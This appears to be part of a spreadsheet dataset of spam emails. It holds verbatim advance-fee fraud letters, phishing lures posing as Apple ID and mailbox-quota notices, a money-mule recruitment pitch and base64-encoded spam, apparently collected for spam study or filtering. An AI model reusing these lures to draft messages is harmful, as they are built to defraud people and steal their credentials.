\nPLEASE accept my sincerest apologies and reply with "remove" in the \nsubject field at tonygremv@starmail.com. I will remove your name \nimmediately! \n\n\nSTOP! If you ever read another e-mail PLEASE take a moment to\nread this one. This really is worth your valuable time.\n\nAt the very least PRINT THIS OUT NOW to read later if you are\npressed for time.\n\n\n SSM1\n7442MCPk0-l9\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93</t>
  </si>
  <si>
    <t>To: &lt;cpunks@minder.net&gt;\nFrom: &lt;health1061820o45@hotmail.com&gt;\nDate: Wed, 24 Jul 0102 00:13:34 +0900</t>
  </si>
  <si>
    <t>Wed, 24 Jul 0102 00:13:34 +0900</t>
  </si>
  <si>
    <t>&lt;health1061820o45@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Penile enlarging without surgery !!</t>
  </si>
  <si>
    <t>------=_NextPart_000_00C5_80C76A1D.C6068D13\nContent-Type: text/html; charset="iso-8859-1"\nContent-Transfer-Encoding: base64\n\n\nPGh0bWw+PGJvZHk+PGRpdiBpZD0ibWVzc2FnZUJvZHkiPjxkaXY+PGZvbnQg\nZmFjZT0iQXJpYWwiIHNpemU9IjIiPlRoaXMgbWVzc2FnZSBpcyBzZW50IHRv\nIG91ciBzdWJzY3JpYmVycyBvbmx5LiBGdXJ0aGVyIHRyYW5zbWlzc2lvbnMg\ndG8geW91IGJ5IHRoZSBzZW5kZXIgb2YgdGhpcyBlbWFpbCB3aWxsIGJlIHN0\nb3BwZWQgYXQgbm8gY29zdCB0byB5b3UuIFNjcmVlbmluZyBvZiBhZGRyZXNz\nZXMgaGFzIGJlZW4gZG9uZSB0byB0aGUgYmVzdCBvZiBvdXIgYWJpbGl0eSwg\ndW5mb3J0dW5hdGVseSBpdCBpcyBpbXBvc3NpYmxlIHRvIGJlIDEwMCUgYWNj\ndXJhdGUsIHNvIGlmIHlvdSBkaWQgbm90IG9wdC1pbiwgb3Igd2lzaCB0byBi\nZSByZW1vdmVkLCBwbGVhc2UgY2xpY2sgPGEgaHJlZj0ibWFpbHRvOmhlYWx0\naDEwNUBtYWlsLnJ1P3N1YmplY3Q9cmVtb3ZlIiB0YXJnZXQ9Im5ld193aW4i\nPmhlcmU8L2E+PC9mb250PjwvZGl2PiAgPHA+PGI+PGZvbnQgZmFjZT0iQXJp\nYWwiPjxmb250IGNvbG9yPSIjZmYwMDAwIj5USElTIElTIEZPUiBBRFVMVCBN\nRU4gT05MWSAhIElGIFlPVSBBUkUgTk9UIEFOIEFEVUxULCBERUxFVEUgTk9X\nICENCjxwPg0KPHAgYWxpZ249ImNlbnRlciI+PGltZyBzcmM9Imh0dHA6Ly9w\nZW5pc2VuaGFuY2UuaHlwZXJtYXJ0Lm5ldC9waG90by5qcGciIHdpZHRoPSIz\nNTEiIGhlaWdodD0iMTc5Ij48L3A+DQo8L2ZvbnQ+PC9wPjxkaXY+V2UgYXJl\nIGEgc2VyaW91cyBjb21wYW55LCBvZmZlcmluZyBhIHByb2dyYW0gdGhhdCB3\naWxsIGVuaGFuY2UgeW91ciBzZXggbGlmZSwgYW5kIGVubGFyZ2UgeW91ciBw\nZW5pcyBpbiBhIHRvdGFsbHkgbmF0dXJhbCB3YXkuIDxwPldlIHJlYWxpemUg\nbWFueSBtZW4gLWFuZCB0aGVpciBwYXJ0bmVycy0gYXJlIHVuaGFwcHkgd2l0\naCB0aGVpciBwZW5pcyBzaXplLiBUaGUgdHJ1dGggaXMgdGhhdCBzaXplIG1h\ndHRlcnM7IG5vdCBvbmx5IGl0IGFmZmVjdHMgbWFueSBtZW4ncyBwZXJmb3Jt\nYW5jZSwgYnV0IHRoZWlyIHNlbGYtZXN0ZWVtIGFzIHdlbGwuPC9wPjxwPiZu\nYnNwOzwvZGl2PjxkaXY+UGVuaXMgZW5sYXJnZW1lbnQgSVMgUE9TU0lCTEU7\nIGp1c3QgYXMgeW91IGNhbiBleGVyY2lzZSBhbG1vc3QgYW55IHBhcnQgb2Yg\nDQp5b3VyIGJvZHksIHlvdSBDQU4gZXhlcmNpc2UgeW91ciBwZW5pcy48L3A+\nDQo8L2ZvbnQ+PC9kaXY+PGZvbnQgY29sb3I9IiNmZjAwMDAiPjxkaXY+PGZv\nbnQgZmFjZT0iQXJpYWwiIGNvbG9yPSIjZmYwMDAwIiBzaXplPSIzIj5PdXIg\ncHJvZ3JhbSBpcyB0b3RhbGx5IFBST1ZFTiBhbmQgMTAwJSBHVUFSQU5URUVE\nICE8L3A+DQo8L2Rpdj48ZGl2Pk91ciBjb21wYW55IGhhcyB0aGUgdGVjaG5p\ncXVlcyEgVG90YWxseSBOQVRVUkFMIHRlY2huaXF1ZXM7IG5vIGdhZGdldHMs\nIG5vIHB1bXBzLCBubyBzdXJnZXJ5ICE8L2Rpdj48cD5JZiB5b3Ugd2FudCBt\nb3JlIGluZm9ybWF0aW9uLCBwbGVhc2UgY2xpY2sgPGEgaHJlZj0iaHR0cDov\nL2xhcmdlMi50cmlwb2QuY29tLmFyIj5oZXJlPC9hPiwgb3Igc2VuZCB1cyBh\nbiBlbWFpbCA8YSBocmVmPSJtYWlsdG86aW5mbzMwMTJAZXhjaXRlLmNvbSAg\nP3N1YmplY3Q9bW9yZWluZm8iPmhlcmU8L2E+PC9wPg0KPC9kaXY+PGRpdj5U\naGlzIElTIE5PVCBVTlNPTElDSVRFRDsgeW91IGFwcGVhciBpbiBhbiBzdWJz\nY3JpcHRpb24gbGlzdCwgaWYgaW4gZXJyb3IsIHBsZWFzZSBsZXQgdXMga25v\ndy4gUGxlYXNlIGxldCB0aG9zZSB3aG8gc3VmZmVyIGZyb20gZXJlY3RpbGUg\nZHlzZnVuY3Rpb24sIHNtYWxsIHBlbmlzIHNpemUsIGFuZCBvdGhlciBtYWxl\nIGFpbG1lbnRzIHJlYWQgdGhpcyBtZXNzYWdlITwvZGl2PjxwPkRJU1BPTklC\nTEUgVEFNQklFTiBFTiBFU1BBTk9MPGZvbnQgY29sb3I9IiNmZmZmZmYiPjUz\nMjJWeVZDMC05MzJLQUZ1NTk3NEVuenAwLTI5MW9pUXI4NzI4QmNZcDQtNTI3\naU5aTTkyMzh0Qk5QMi05NzNlbGZDODk5M1lpUWQ3LTMxbDc1\n------=_NextPart_000_00C5_80C76A1D.C6068D13--\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132</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: =?utf-8?B?QXBwU3RvcmU=?= &lt;do-not-reply@newsletter.eu&gt;\nDate: Wed, 24 Feb 2016 05:29:41 +0800</t>
  </si>
  <si>
    <t>Wed, 24 Feb 2016 05:29:41 +0800</t>
  </si>
  <si>
    <t>=?utf-8?B?QXBwU3RvcmU=?= &lt;do-not-reply@newsletter.eu&gt;</t>
  </si>
  <si>
    <t>=?utf-8?B?WW91IGhhdmUgYSBwcm9ibGVtIHdpdGggeW91ciBBcHBsZSBhY2NvdW50?=</t>
  </si>
  <si>
    <t>You are viewing this plain text version of email because your email client does not support HTML emails. To view this email follow the link below: [URL]http://facheup22.newsletter.eu[/URL]   Click Here to view this newsletter in your browser. 									         Apple Store You have a problem with your Apple account, We just need to verify that this e-mail address belongs to you. Simply click the link below and login using "Apple ID" and your password. Verify your lD  Apple 2016 © All rights reserved   Message sent to: jose@monkey.org  Message sent from: AppStore, 58 Street Charilie, London, London (City of) - GB 2016  To unsubscribe, click here</t>
  </si>
  <si>
    <t>http://facheup22.newsletter.eu</t>
  </si>
  <si>
    <t>1459</t>
  </si>
  <si>
    <t>To: webmaster &lt;webmaster@aclweb.org&gt;\nFrom: Dr.Obafemi Heinz &lt;managersales@webmail.co.za&gt;\nDate: Wed, 24 Aug 2005 16:24:59 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Aug 2005 16:24:59 -0400</t>
  </si>
  <si>
    <t>Dr.Obafemi Heinz &lt;managersales@webmail.co.za&gt;</t>
  </si>
  <si>
    <t>webmaster &lt;webmaster@aclweb.org&gt;</t>
  </si>
  <si>
    <t>We are searching for representatives</t>
  </si>
  <si>
    <t>Golden Neo-Life Diamite (GNLD)\nSOUTH AFRICA\nJohannesburg: Head &amp; DSC Office\n54 Steel Road, Spartan, 1619\nGauteng, South Africa .\nTele/Fax:27-762901347.\nWebsite:[URL]www.gnld.co.za[/URL]\n\nDear Sir/Madam,\n           I am Dr.Obafemi Heinz,sales manager GNLD South Africa.We are a \ncompany with a group of registered doctors.which deals on Phamaceuticals,Medical,Food supplements and Home care products and export into the Canada/America and Europe.We are searching for representatives who can help us establish a medium of getting to our downlines/customers in the Canada,America and Europe as well as making payments through you to us. Please contact us for more information, Subject to your \nservice you will retain 10% of every payment made to you for your services as \nour representative in Canada/America and Europe. Please if you are interested forward to us the complete information required below.\nplease filling the blank spaces below:\n1.Your Full Names:\n2. Your Full Contact Address:\n3.State/Country:\n4. Your Phone :\n5.Fax Numbers:\n\nAnd send details to: managersales@webmail.co.za.\n\nBest Regards,\nDr.Obafemi Heinz\nSales manager\nGNLD\n \n\n</t>
  </si>
  <si>
    <t>www.gnld.co.za</t>
  </si>
  <si>
    <t>1456</t>
  </si>
  <si>
    <t>To: andrekoffi@virgilio.it\nFrom: ANDRE KOFFI &lt;andrekoffi@virgilio.it&gt;\nDate: Wed, 24 Aug 2005 10:57:41 +0200</t>
  </si>
  <si>
    <t>Wed, 24 Aug 2005 10:57:41 +0200</t>
  </si>
  <si>
    <t>ANDRE KOFFI &lt;andrekoffi@virgilio.it&gt;</t>
  </si>
  <si>
    <t>andrekoffi@virgilio.it</t>
  </si>
  <si>
    <t>MR. ANDRE KOFFI REPLY ME BACK</t>
  </si>
  <si>
    <t>\n\nDearest: Friend,\n\nMy Name is Mr.Andre Koffi a credit officer with the one\nof the leading Bank (Finance Trust House) here in Cotonou Republic Du Benin.\nIn my department i discovered an abandoned sum of (USD 32 m)  in an account\nthat belongs to one of our foreigncustomer (MR. ANDREAS SCHRANNER from Munich,\nGermany) who died along with his entire family in July 2000 in a plane crash.\n\n[URL]http://news.bbc.co.uk[/URL]\n\nstm Since i got information about his death, I have been expecting his next of\nkin to come over and claim his money because we cannot release it unless some\nbody applies for it as next of kin or relation to the deceased as indicated in\nour banking guidlings and laws but unfortunately we learnt that all his\nsupposed next of kin or relation died alongside with him at the plane crash\nleaving nobody behind for the claim. It is therefore upon this discovery that\nI now decided to make this business proposal to you and release the money to\nyou as the next of kin or relation to the deceased for safety and subsequent\ndisbursement since nobody is coming for it and we don't want this money to go\ninto the bank treasury as unclaimed bill. The banking law and guidline here\nstipulates that if such money remained unclaimed after Five years, the money\nwill be transfered into the bank treasury as unclaimed fund. The request of\nforeigner as next of kin in this business is occassioned by the fact that the\ncustomer was a foreigner and an Indigen cannot stand as next of kin to a\nforeigner.\n\nI agree that 30% of this money will be for you as a respect to the provision\nof a foriegn account , 5% will be set aside for expenses incurred during the\nbusiness,another 5% to help the less previlage and to assist the charity\norganisations here in Africa and abroad while the rest 60% would be for me\nThereafter, I will visit your country for disbursement according to the\npercentage indicated .\n\nTherefore, to enable the immediate transfer of this fund to you arranged,you\nmust apply first to the bank as relation or next of kin of the deceased\nindicating your bank name, your bank account number, your private telephone\nand fax number for easy and effective communication and location where in the\nmoney will be remitted. Upon receipt of your reply, I will send to you by fax\nor email the text of the application .\n\nI will not fail to bring to your notice that this transaction is hitch-free\nand that you should not entertain any atom of fear as all required\narrangements have been made for the transfer.\n\nYou should contact me immediately as soon as you receive this letter. Trusting\nto hear from you immediately.\n\nYours Faithfully,\nMr.Andre Koffi\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>4737</t>
  </si>
  <si>
    <t>To: &lt;yyyy@netnoteinc.com&gt;\nFrom: "Hi-Mind Infos" &lt;info@hi-mind.com&gt;\nDate: Wed, 24 Apr 2002 00:46:22 +0200 (added by postmaster@wanadoo.fr)</t>
  </si>
  <si>
    <t>Wed, 24 Apr 2002 00:46:22 +0200 (added by postmaster@wanadoo.fr)</t>
  </si>
  <si>
    <t>"Hi-Mind Infos" &lt;info@hi-mind.com&gt;</t>
  </si>
  <si>
    <t>&lt;yyyy@netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>Hi-Mind:Opt-in referencement</t>
  </si>
  <si>
    <t>&gt;From Hi-Mind, Assembler of LCD TFT monitors, LCD TV , Plasma.\nTHIS IS NOT A SPAM. This is an Opt-In Opt-Out clarification.\nO/ref Uk_05229\n\nDear Madam,\nDear Sir,\n\nYou are receiving this mail as you are professionally involves in Computer, Systems and Display Business.\nWe are willing to inform you regularly by e-mail about Hi-Mind's products, opportunities.\n\nWith respect to Opt-In:\n1. You consider  our infos can be usefull: Do not reply to this mail.\n \n2. You  consider you our infos will be not workable. Please unsubscribe by clicking on infos@hi-mind.com?subject=Please_Unsubscribe\n\n3. You are curious to know more please click on:\n\n[URL]http://www.hi-mind.com[/URL]\n\nBest regards\nS. C Svatshenk\nHi-Mind Communication</t>
  </si>
  <si>
    <t>http://www.hi-mind.com</t>
  </si>
  <si>
    <t>1599</t>
  </si>
  <si>
    <t>To: stephenayling@hotmail.com\nFrom: STEPHEN AYLING &lt;stephenayling9@hotmail.com&gt;\nDate: Wed, 23 Nov 2005 09:44:59 +0000</t>
  </si>
  <si>
    <t>Wed, 23 Nov 2005 09:44:59 +0000</t>
  </si>
  <si>
    <t>STEPHEN AYLING &lt;stephenayling9@hotmail.com&gt;</t>
  </si>
  <si>
    <t>stephenayling@hotmail.com</t>
  </si>
  <si>
    <t>PROPOSITION</t>
  </si>
  <si>
    <t>\nDear Friend,\n\nGreetings to you.\n\nI wish to accost you with a request that would be of immense benefit to both \nof us. Being an executor of wills, it is possible that we may be tempted to \nmake fortune out of our client's situations, when we cannot help it, or left \nwith no better option. The issue I am presenting to you is a case of my \nclient who willed a fortune to his next-of-kin. It was most unfortunate that \nhe and his next-of-kin died on the same day the 31st October 1999 in an \nEgyptian airline 990 with other passengers on board. You can confirm this \nfrom the website below which was published by BBC WORLD NEWS.\n\nWEBSITE.\n[URL]http://news.bbc.co.uk[/URL]\n\nI am now faced with confusion of who to pass the fortune to.\nAccording to the English law, the fortune is supposed to be bequeathed to \nthe government,if nobody comes forward as the next of kin within seven years \nof the demise of the benefactor of the will. My purpose of contacting you is \nto seek your acting as the beneficiary of the will, and lay claim to the \nlegacy of $7million, which my deceased client  bequeathed to his \nnext-of-kin. For now, I alone know about his will, as my client had great \nconfidence in me.\n\nEverything will be left between you and I. The share would be 25% for you \nand 75% for me. I would want to give a huge part of my share to the tsunami \nvictims,\nas this is my primary objective. All I have to do is amend the will or add a \ncodicil to make you the beneficiary to the $7million legacy.\n\nAgain, I feel that you may apprehensive and consider this amount too big for \nyou to defend. It does not matter, as there are documents to back it up.\nThis is a legacy being passed on to a next-of-kin. As I am not very sure of \ngetting your consent on the issue I prefer not to divulge my full identity \nso as not to risk being disbarred. The English Bar considers it a breach of \nthe oath of the English Bar. I need not emphasize to you that the \nsensitivity of this issue need not be toyed with by neglecting its \nconfidentiality. I therefore appeal to you not discuss this request with \nanybody, even if you decline my request.\n\nI look forward to hearing from you soon.\n\nYours truly\n\nStephen Ayling.\n\n\n\n\n</t>
  </si>
  <si>
    <t>3094</t>
  </si>
  <si>
    <t>To: nan\nFrom: MRS CHRISTINA HOLDEN &lt;chisnaam@yahoo.com&gt;\nDate: Wed, 23 May 2007 18:32:58 +0100</t>
  </si>
  <si>
    <t>Wed, 23 May 2007 18:32:58 +0100</t>
  </si>
  <si>
    <t>MRS CHRISTINA HOLDEN &lt;chisnaam@yahoo.com&gt;</t>
  </si>
  <si>
    <t>DEAR BELOVED,I am Mrs. Christina Holden. Am married to Dr. Donald Holden. a Liberian who worked for Shell Oil Company in Nigeria,he died after a brief illness that lasted for only four days.Before his death we were married for 11 good years without a child and were both born again Christians . Since his death I decided not to re-marry or get a child outside my matrimonial home which the Bible forbids. When my late husband was alive he deposited the sum of $10.5 Million (Ten Million five hundred thousand U.S.Dollars) with A Bank.Presently, this money is still under the safe keeping of the RESERVE FINANCE COMPANY Recently, my Doctor told me that I would notlast for the next Three(3) months due to my cancer problems.Though what disturbs me most now, i recently had stroke.Having known my condition, I decided to donate this fund to church or betterstill a Christian or muslim individual That will utilize this money theway I am going to instruct here in. I want a church tha t will use this fund on,orphanages, deaf and dumb and poor widows propagating the word of God and to ensure that the house of God is maintained.The Bible made us to understand that blessed is the hand that giveth.I took this decision because I don't have any child that will inherit this money and my husband relatives are not Christians and I don't want my husband's hard earned money to be misused by unbelievers. I don't want a situation where this money will be used in an ungodly manner. Hence the reason for taking this bold decision. As soon as I receive your reply I will forward your personal information, such as Your full name, Your full address, with Your telephone and fax number to my lawyer through his email so that he will contact you as the legal owner of my fund before the bank will be transferring the fund into your nominated Bank Account in your country. I will also issue you a letter of a authority that will back you up as the real next of kin and the original- b eneficiary of my fund. I want you and the church to always pray for me because the lord is my shepherd,you will also promise me that you will not seat on the fund when it gets into your bank account. My happiness is that I lived a life of a worthy Christian. Whoever that wants to serve the Lord must serve him in spirit and truth. Please always be prayerful all through your life, any delay in your reply will give me room in serching for a church or Christian individual for this same purpose. Please assure me that you will act accordingly as I stated herein.Hoping to hear from you as soon as possible.Remain blessed in the name of the Lord. Yours in Christ, Mrs. Christina Holden.</t>
  </si>
  <si>
    <t>\n\n\n\n-----------------------------------------------\nThis mail sent through [URL]http://webmail.zoom.co.uk[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://webmail.zoom.co.uk</t>
  </si>
  <si>
    <t>170</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Account Service" &lt;info@connoisseurcatering.com.ph&gt;\nDate: Wed, 23 Mar 2016 00:50:45 +0100</t>
  </si>
  <si>
    <t>Wed, 23 Mar 2016 00:50:45 +0100</t>
  </si>
  <si>
    <t>"Account Service" &lt;info@connoisseurcatering.com.ph&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">NOTICE </t>
  </si>
  <si>
    <t>Dear jose@monkey.org,    Your mailbox is almost full.      1969MB	  	  	  	  	  	 2000MB    We noticed your E-mail account has almost exceed it's limit. And you may not be able to send or receive new messages until you re-validate,   Click Here to Re-Validate.   WARNING:   failure to re-validate your E-mail account. It will be permanently disable.   Thanks, Account Service --- This email has been checked for viruses by Avast antivirus software. [URL]https://www.avast.com[/URL] Dear jose@monkey.org,  Your mailbox is almost full. 1969MB 2000MB   We noticed your E-mail account has almost exceed it's limit. And you may not be able to send or receive new messages until you re-validate,   Click Here to Re-Validate.   WARNING:   failure to re-validate your E-mail account. It will be permanently disable.   Thanks, Account Service No threats detected. [URL]www.avast.com[/URL]</t>
  </si>
  <si>
    <t>https://www.avast.com www.avast.com</t>
  </si>
  <si>
    <t>1210</t>
  </si>
  <si>
    <t>To: patrick_agolo2002@yahoo.co.nz\nFrom: patrick agolo &lt;patrick_agolo2002@yahoo.co.nz&gt;\nDate: Wed, 23 Mar 2005 01:59:36 +1200</t>
  </si>
  <si>
    <t>Wed, 23 Mar 2005 01:59:36 +1200</t>
  </si>
  <si>
    <t>patrick agolo &lt;patrick_agolo2002@yahoo.co.nz&gt;</t>
  </si>
  <si>
    <t>patrick_agolo2002@yahoo.co.nz</t>
  </si>
  <si>
    <t>ATTENTION PLS</t>
  </si>
  <si>
    <t xml:space="preserve">Hello my dear\n \nI wish to solicit your kind and urgent assistance.My name is Mr.PATRICK AGOLO, a lawyer based in Lagos State of Nigeria.As a lawyer, I was a private legal adviser (for almost two decades) to a white couple who unfortunately lost their lives 3-months ago in a ghastly motor accident here in Nigeria. Prior to their death, this white couple had lived in this country since the 1960?s as missionaries and educationists. Unfortunately, they died childless, with no knownrelatives or next of kin.\n \nThe issue at stake, for which I am writing you now, is that the deceased left behind the sum of US$7.8million in their joint account with ECO INTERNATIONAL BANK Nigeria Incorporated.\nSoon after the burial of the deceased, I had promptly notified the bank,which is awaiting me to present to them the person that is to inherit the account of the deceased.\n \nIncidentally, as I said before, the late couple had no known next of kin or relatives. No one else knows about this.However, it will amount to abuse of privilege for me to lay claim to the wealth and estate of the deceased, since as a black man i couldn't have been their relative. But then funds can't be left to the bank permanently/forever. So I have decided to contact you, to seek your consent to present your name to the bank as the next of kin and the appointed administrator/inheritor of the estates of the deceased.\n \n As a whiteman, you'll fit into the picture.As the lawyer to the deceased, no body can disbelieve me if i present you as the next of kin to the deceased. Moreover, I know the exact legal requirements and documents to secure in your favour to show proof that you are actually the next of kin/inheritor of everything left behind by the deceased. All these will be my responsibility to obtain from the court here in Nigeria. You won?t be needed here in person.\nI can assure you that this is my specialty and there is nothing for you to be afraid of. I will handle and provide for all that it will take legally.Once everything needful is done, the bank will be satisfied to transfer the monies from the account of the deceased to yours.\n \nMy interest is to take 60% of the funds while you take 30%, while the remaining 10% will be disbursed to any Orphanage-Home of our common choice.Please communicate your decision to me urgently, indicating your Telephone number in your reply so that I can call you and talk this thing over with you.\nPls. keep these disclosures confidential.\nThank you.\n\nSincerely yours,\nBarrister PATRICK AGOLO(ESQ)\n \n\n\n\n__________________________________________________\nDo You Yahoo!?\nTired of spam?  Yahoo! Mail has the best spam protection around \n[URL]http://mail.yahoo.com[/URL] </t>
  </si>
  <si>
    <t>http://mail.yahoo.com</t>
  </si>
  <si>
    <t>1150</t>
  </si>
  <si>
    <t>To: R@M\nFrom: linda sule &lt;lindasule_11@yahoo.fr&gt;\nDate: Wed, 23 Feb 2005 13:48:20 +0100</t>
  </si>
  <si>
    <t>Wed, 23 Feb 2005 13:48:20 +0100</t>
  </si>
  <si>
    <t>linda sule &lt;lindasule_11@yahoo.fr&gt;</t>
  </si>
  <si>
    <t>MRS LINDA</t>
  </si>
  <si>
    <t>FROM MRS LINDA SULE \nHello,\nPermit me to inform you of my desire of going into\nbusiness relationship with you. I believe you are a\nreputable and responsible and trustworthy person I\ncando business with from the little information so far\ngathered about you during my search for a partner and\nby matter of trust I must not hesitate to confide in\nyou for this simple and sincere business. \n\nI am MRS LINDA SULE  the only Wife of late MR SIMON\nSULE, my husband was assassinated by therebels during\ntheir attacked in our country cote divoire and took\nover our town BOUAKE. \nI ran to Abidjan the economical capital of cote d\nivoire from were I am contacting you. Before the\ndeathof my husband he told me that he has a sum of usd\n$24,000,000 (twenty-four million united statesdollars)\nkept in a private security company in Cote d' Ivoire\nin the name of my only son as the next as the of kin.\nin the capacity of the next of kin, I am contactingyou\nwith due sence of humanity and responsibility and with\nfew awareness that you will give ita sympatheticand\nmutual consideration. \nNow that we are in Abidjan and verified the\ntransacting, we need your assistance to help us move\nthis funds out of Cote d"Ivoire for investment in your\ncountry as we cannot invest here due to our  country\nand the war still going on there. \nBy this mail, you are now requested to arrange a visit\ndown to Abidjan so that we shall know our selves and\narrange on how to transfer this money to your country.\n\nBut if you can not come down, then let have your full\ndetails so that I will plan on how to transfer\nthismoney out of Africa immediately for investment in\nyourcountry. \nThere is need for urgent actions because I pay US$50\ndaily as demurrage to the security company for keeping\nthis consignments. Your services will also be required\non advising us forproper investment programs in your\ncountry after this transfer is concluded. \nThis is subject to my acceptances of  charges you\nrequired. Please treatthis issue as confidential\nandcontact me immediately with the above yahoo private\ne-mail address mrssulel@yahoo.fr for more information\nabout this transaction. \nReply me this message immediately. Thanks, Wishing \nyou God richest blessing \nYours Faithfully \nMrs. Linda SULE \n\n\n\n\n	\n\n	\n		\nDcouvrez le nouveau Yahoo! Mail : 250 Mo d'espace de stockage pour vos mails ! \nCrez votre Yahoo! Mail sur [URL]http://fr.mail.yahoo.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://fr.mail.yahoo.com</t>
  </si>
  <si>
    <t>155</t>
  </si>
  <si>
    <t>To: R@M\nFrom: MR GBENRO ADEGBOLA &lt;salisu_bola@yahoo.com&gt;\nDate: Wed, 23 Apr 2003 19:50:07 +0100</t>
  </si>
  <si>
    <t>Wed, 23 Apr 2003 19:50:07 +0100</t>
  </si>
  <si>
    <t>MR GBENRO ADEGBOLA &lt;salisu_bola@yahoo.com&gt;</t>
  </si>
  <si>
    <t>EXPECTING YOUR MAIL OR PHONE CALL.</t>
  </si>
  <si>
    <t>DEAR SIR/MADAM.\n\nI REGRET THAT MY MAIDEN COMMUNICATION TO YOU IS AT\nMY PRESENT STATE OF AWKWARD PREDICAMENT.\nNEVERTHELESS, I HAVE THE BELIEVE IN THE ALMIGHTY GOD\nTHAT YOU WOULD NOT TREAT MY REQUEST WITH CONTEMPT.\n\nI AM MR GBENRO ADEGBOLA THE SON-IN-LAW TO MRS\nELIZABETH ATINUKE THE FIRST WIFE OF THE SLAIN NIGERIAN JUSTICE MINISTER BOLA IGE WHO WAS ASSINATED BY UNKNOWN MEN ON 23RD DECEMBER 2001. WHILE THE FAMILY WAS TRYING TO \nOVERCOME THE SUDDEN DEATH OF THE JUSTICE MINISTER, THE\nWORST HAPPENED ON THURSDAY MORNING WHEN THE NEWS CAME THAT MRS IGE HAS DIED AS A RESULT OF MALARIA BOUT IN HER SYSTEM.\n\n\nBEFORE HER DEATH, SHE GAVE TO ME SOME DOCUMENTS\nRELATING TO A $35.000.000.00 DOLLARS DEPOSITED IN A SECURITY COMPANY\nHERE, MY WIFE FUNSO WHO IS THE FIRST DAUGTHER AND I THE HUSBAND IS LOOKING FOR A TRUSTWORTHY FOREIGNER WHO WILL RECEIVE THIS MONEY ON OUR BEHALF FOR SAFE KEEPING PENDING WHEN WE WILL JOIN HIM/HER TO INVEST THIS FUND ON ANY PROFIT ORIENTED BUSINESS VENTURE THAT HE/SHE MIGHT INTRODUCE US TO.\n\nPLEASE IF YOU ARE READY TO HELP US NOT HAVING IN MIND\nTO DISAPPEAR WITH THE MONEY WHEN IT IS IN YOUR CUSTODY, KINDLY CONTACT US VIA EMAIL TO NOTIFY US OF YOUR READINESS TO ASSIST US IN THIS LIFE TIME OPPORTUNITY.\n\nYOU CAN CHECK THESE AUTHORITATIVE WEB PAGE FOR MORE\nINFORMATION.\n[URL]http://www.ngrguardiannews.com[/URL] UNDER THE CAPTION:\nIGE�S WIFE DIED OF MALARIA, SAY�S FAMILY OR [URL]http://www.thisdayonline.com[/URL]\nUNDER THE CAPTION: SYMPATHISERS PAY ATINUKE IGE LAST RESPECTS.\n\nBEST REGARDS,\n\nGBENRO ADEGBOLA.\n234-803-3314847\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.ngrguardiannews.com http://www.thisdayonline.com</t>
  </si>
  <si>
    <t>418</t>
  </si>
  <si>
    <t>To: R@M\nFrom: jrchesson@rediffmail.com\nDate: Wed, 22 Oct 2003 12:27:53 -0700</t>
  </si>
  <si>
    <t>Wed, 22 Oct 2003 12:27:53 -0700</t>
  </si>
  <si>
    <t>jrchesson@rediffmail.com</t>
  </si>
  <si>
    <t>Chessonfamily corporation</t>
  </si>
  <si>
    <t>From: J. Rodney Chesson \nChesson Family Corporation,\nLiberia.\nEmail: jrchesson@rediffmail.com\n\nKindest attention,\n\nI am very sorry for the informal manner in which this mail is reaching you. This is necessitated by my urgent need to reach a dependable and trustworthy foreign partner. This request may seem strange and unsolicited but I crave your indulgence and pray that you take my request very serious.\n\nI am Mr. J. Rodney Chesson, the first son of Late J. J. F. Chesson (Liberian Minister of Justice 1979 to 1980). On April 22, 1980, my father along with 12 other Liberian Government officials was assassinated as a result of a military coup that toppled the government of President William\nR. Tolbert, Jr. May his soul rest in Eternal Peace. Since then, my family has always been seen as a symbol of peace in Liberia. \n\nI received information from a reliable source that described your country as being economically conducive for investment and her people as transparent and trustworthy to engaging business, which made me to write you. As you may want to know and to make you less curious, I got your email address from an Internet site that portrayed you in good light.\n\nEarly this year, Liberia rebels agitated for the removal of President Charles Taylor, who portrayed a very good example of a bad leader. The President who needed support from prominent Liberia citizen gave me the sum of twenty-eight million United States Dollars (US$ 28M) cash (stalked in two trunk boxes) as compensation for my late father and solicited for my support. \n\n\nI quickly made an arrangement with a courier company here in Monrovia and moved the consignment to an asset management company in Europe. I did not support President Charles Taylor because my conscience is not for sale. Some months later heavy fight broke up in Liberia, he placed all the eligible members of my family under travel watch confiscated all our traveling documents and frozen all our account in Liberia. Later in July, foreign troops invaded Liberia and different peace keeping meetings were held and President Taylor was advised to step down for national peace. On the 11th August 2003 President Charles Taylor flied into exile and handed over power to his Vice-President Moses Blah who is even more wicked and dangerous. He was the person that instigated Taylor to confiscated all our traveling documents and frozen all our account in Liberia. On Tuesday 14th October 2003, Gyude Bryant took office in Liberia as the head of an interim government. Bryant, 54 was by picked b!\n y the warring factions and this step has offered Liberia a new chance to end nearly 14 years of violence. My lawyer approached him as regards releasing our traveling documents and the embargo on our bank accounts but he declined and told us that his priority is disarm fighters and pave the way for elections that is why I requested for your sincere assistance pending when a fresh election will be held here. \n\nWHAT YOU ARE EXPECTED TO DO FOR US: \n\nI will transfer the ownership of the consignment /boxes containing the cash to you and issue you a power of attorney through my Lawyer. With these document you will claims to the money as my proxy from the asset management company in Europe. The entire operation is risk free since it is only you and me and my Lawyer that knows the details of the money after you must have taken the money to your country where it is save my lawyer will then meet you in your country to use my share of the money for investment. Bearing in mind that your assistance is needed to transfer this fund, I propose a commission of 20% (twenty percent) of the total sum to you for the expected services and assistance.\n\nYour private fax and telephone numbers are needed to enhance the speedy conclusion of this transaction (our only hope in life now) urgently. Your urgent response via the above email address is highly needed so as to stop further contact. I must use this opportunity to implore you to exercise the utmost indulgence to keep this matter extra ordinarily confidential whatever your decision while I await your prompt response. Our phone line both home and abroad are bugged. So don't call me. I will always call you at my convenient time and in a conducive atmosphere.\n\nBest regards,\n\nJ. Rodney Chesson.\n\n\nN.B. Please reply with above email address (jrchesson@rediffmail.com). I want you to note that neither the Chesson Family Corporation nor any of its officials are soliciting money of any kind or financial or other assistance from organizations, agencies, or individuals. Visitors to our website are advised that there is a current scam by unknown individuals using our corporation website and my name to solicit money or goods from the public. We advise that all who receive letters soliciting funds, etc, in my name or the name of our corporation to report them to your local law enforcement authorities. This notice is a 